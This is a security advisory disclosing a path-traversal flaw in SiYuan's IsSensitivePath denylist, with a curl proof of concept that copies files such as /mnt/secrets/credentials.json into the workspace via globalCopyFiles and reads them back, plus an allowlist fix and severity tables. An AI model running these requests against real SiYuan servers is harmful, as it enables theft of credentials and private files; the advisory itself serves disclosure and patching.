The IsSensitivePath() function in kernel/util/path.go uses a denylist approach that was recently expanded (GHSA-h5vh-m7fg-w5h6, commit 9914fd1) but remains incomplete. Multiple security-relevant Linux directories are not blocked, including /opt (application data), /usr (local configs/binaries), /home (other users), /mnt and /media (mounted volumes). The globalCopyFiles and importStdMd endpoints rely on IsSensitivePath as their primary defense against reading files outside the workspace.
Current denylist in kernel/util/path.go:391-405:
prefixes := []string{
"/.", // dotfiles
"/etc", // system config
"/root", // root home
"/var", // variable data
"/proc", // process info
"/sys", // sysfs
"/run", // runtime data
"/bin", // binaries
"/boot", // boot files
"/dev", // devices
"/lib", // libraries
"/srv", // service data
"/tmp", // temp files
}
NOT blocked:
- /opt — commonly contains application data, databases, credentials. In SiYuan Docker, /opt/siyuan/ contains the application itself.
- /usr — contains /usr/local/etc, /usr/local/share, custom configs
- /home — other users' home directories (only ~/.ssh and ~/.config of the current HomeDir are blocked via separate checks, but other users' homes are accessible)
- /mnt, /media — mounted volumes, network shares, often containing secrets
- /snap — snap package data
- /sbin, /lib64 — system binaries/libraries
The globalCopyFiles endpoint at kernel/api/file.go:82 uses IsSensitivePath as its sole path validation:
if util.IsSensitivePath(absSrc) {
// reject
continue
}
// File is copied into workspace — then readable via /api/file/getFile
# Read SiYuan's own application files from /opt (Docker deployment)
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
-H 'Authorization: Token YOUR_API_TOKEN' \
-H 'Content-Type: application/json' \
-d '{"srcs":["/opt/siyuan/kernel/SiYuan-Kernel"],"destDir":"data/assets"}'
# Then read the copied file from workspace
curl -s 'http://127.0.0.1:6806/api/file/getFile' \
-H 'Authorization: Token YOUR_API_TOKEN' \
-H 'Content-Type: application/json' \
-d '{"path":"data/assets/SiYuan-Kernel"}'
# Read files from mounted volumes
curl -s 'http://127.0.0.1:6806/api/file/globalCopyFiles' \
-H 'Authorization: Token YOUR_API_TOKEN' \
-H 'Content-Type: application/json' \
-d '{"srcs":["/mnt/secrets/credentials.json"],"destDir":"data/assets"}'
/opt, /usr, /home, /mnt, /media and any other non-denylisted pathSwitch from a denylist to an allowlist approach. Only permit copying from the workspace directory and explicitly approved external paths:
func IsSensitivePath(p string) bool {
absPath := filepath.Clean(p)
// Allowlist: only workspace and configured safe directories
if strings.HasPrefix(absPath, WorkspaceDir) {
// Block workspace-internal sensitive paths (conf/)
if strings.HasPrefix(absPath, filepath.Join(WorkspaceDir, "conf")) {
return true
}
return false
}
// Everything outside workspace is sensitive by default
return true
}
| Score | Percentile |
|---|---|
| 0.06% | 18.09% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 6.8 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-vm69-h85x-8p85 ↗ |
| CVE | CVE-2026-33194 ↗ |
| CWE id | Name |
|---|---|
| CWE-22 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| go | github.com/siyuan-note/siyuan/kernel | <= 3.6.1 | 3.6.2 | — |